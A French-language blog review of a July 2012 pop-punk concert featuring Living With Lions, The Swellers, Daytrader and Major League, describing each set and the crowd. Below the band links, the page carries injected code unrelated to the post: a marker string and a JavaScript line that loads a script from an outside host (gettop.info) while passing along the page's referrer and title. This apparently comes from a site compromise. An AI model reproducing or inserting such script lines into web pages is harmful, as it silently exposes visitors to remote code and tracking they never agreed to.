Show de Living With Lions + The Swellers + Daytrader + Major League à l’Union commerciale, jeudi le 12 juillet 2012.


Facebooktwitterredditpinterestlinkedinmail

Quoi de mieux qu'un show de Living With Lions, The Swellers, Daytrader et Major League pour aller profiter de la nouvelle salle all ages toujours en rénovation? Rien! Sincèrement, la totalité du spectacle était délicieux. Quatre excellents groupes, tous sensiblement dans un même style, pop punk, à l'exception de Living With Lions qui a un vocal un peu moins clean que les trois autres bands. Major League ouvre le bal avec leurs chansons toutes aussi bonnes les unes que les autres. Les américains du New Jersey ont donné une prestation plutôt intéressante et énergisante, mais l'ambiance est demeurée très tranquille, probablement parce que plusieurs personnes de la foule ne connaissaient pas la formation. Par contre, je suis certaine que le groupe a été une belle découverte pour un bon nombre d'entre eux. Ils ont joué entre autres Some Kids Just Can't Hang et The Truth Is.  Ça s'est ensuite poursuit avec Daytrader. Personnellement, ce n'est pas dans mes groupes préférées, car je trouve ça beaucoup trop tranquille en spectacle, mais je sais reconnaître qu'ils ont tout de même livré une belle performance. Je n'ai pas été surprise de la qualité de leur spectacle, étant donné que je les avais vu récemment au Studio Sonar, avec les extraordinaires Pentimento et Parisae. La formation new-yorkaise, a su satisfaire quelques individus qui patientaient pour les deux derniers groupes. L'ambiance était plutôt relaxe, semblable à celle de Major League, mais avec un peu plus de personnes qui chantent les chansons. Enfin, The Swellers embarque sur la scène. Le monde commence à se réveiller pas mal, chantent et il commence à se créer un slam. Belle énergie, un band tout simplement adorable et talentueux. Bref, ils enflamment le tout avec leur hits de quelques uns des derniers disques dont Bottles, Sleeper, Runaways, Inside My Head, The Best

I Ever Had, Fire Away, 2009 et Red Lights. Ma seule déception: mes deux chansons préférées qui n'ont pas été jouées (The Inside et By A Thread) et le fait qu'ils n'ont pas fait de chansons des premiers CDs. Dommage, mais tout de même mémorable comme spectacle. Finalement, MA cerise sur le sundae de la soirée, Living With Lions. En plus, que j'avais hâte de voir le band nouvellement revenu avec leur premier chanteur, Matt Postal. La formation de Vancouver existe depuis 2007 et a maintenant un EP, Dude Manor (2006) et deux CDs, soit Make Your Mark (2008), ainsi que Holy Shit (2011) à leur actif. Bref, une des meilleures performances à vie que j'ai vu de LWL, fortement comparable au show qu'il y avait eu au Scanner, il y a environ un an. L'ambiance était complètement éclatée, du monde crinqué, de la bière et de l'eau qui revolent partout, des stagedives manqués dû au fait que marcher et courir sur la scène étaient des actions totalement impossibles tellement c'était une patinoire de bières, du monde complètement chauds (je m'inclus), des blessures ainsi que des ecchymoses et le t-shirt blanc de Yannick Cimor Mattar de Get A Room qui est rendu rouge de sang à la fin du show. En résumé, un spectacle totalement mémorable, une ambiance et une énergie de mongole; c'était la perfection pour moi. Ils ont joué pas mal toutes les chansons que je voulais et je dirais même qu'ils ont joués plus de la moitié de leurs chansons. Donc, sachez que la chanson que vous vouliez probablement entendre a été probablement jouée. Bref, vous pourrez en conclure par vous-même, car le setlist sera à venir. C'était incroyable! Vous allez regretter de ne pas y avoir été. Croyez-moi, c'était du beau.

http://majorleague.bandcamp.com/

http://daytrader.bandcamp.com/

http://www.myspace.com/theswellers

http://www.myspace.com/livingwithlions

zp8497586rq

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Previous Mastodon et Grimskunk pour les Pur et Dur
Next Ondes Chocs et Sanyja Hart du Hellfest